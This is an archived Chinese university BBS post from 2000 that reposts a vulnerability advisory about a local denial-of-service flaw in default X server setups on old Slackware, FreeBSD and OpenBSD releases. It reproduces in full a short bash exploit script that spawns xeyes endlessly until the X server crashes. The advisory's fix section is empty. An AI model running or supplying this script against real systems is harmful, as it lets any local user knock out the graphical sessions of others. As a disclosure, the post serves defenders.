荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (???????????????????????????????????????), 信区: Hacker
标 题: [转载] 本地用户对X拒绝服务攻击
发信站: BBS 荔园晨风站 (Sun May 28 23:01:13 2000), 转信
【 以下文字转载自 bstone 的信箱 】
【 原文由 bstone 所发表 】
本地用户对X拒绝服务攻击
漏洞发布时间:2000-04-04
漏 洞 描 述:
Slackware 7, FreeBSD 3.1, and OpenBSD 2.6默认安装配置的bawX系统,存在一
个拒绝服务的安全问题,本地一般用户通过执行下面的脚本程序,将导致X服务崩
溃。对于Redhat,和其它版本的Linux(如Mandrake, WinLinux,等等)不起作用。
漏洞检测程序如下:
#!/bin/bash
# Simple Local Denial of Service Exploit Against X
# coded by bansh33 of r00tabega
# www.r00tabega.com 0wnz you
#
# propz to my mommy and daddy cuz they make my drink my milk
#
# Tested under Slackware 7, FreeBSD 3.1, and OpenBSD 2.6
# The problem lies in the fact that most users use the default config
# of X. A little configuration to specify your monitor, settings, etc
will
# fix this.
# Does not work with Redhat, or anything based off it (Mandrake,
WinLinux, etc)
# Any user can login and execute this to DoS the bawx.
while [ 1=1 ];
do
xeyes -display :0 &
done
解 决 方 法:
本文出自:广州京九网联
--
Welcome to http://192.168.28.98
※ 来源:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.28.106]
--
※ 转载:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.28.98]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店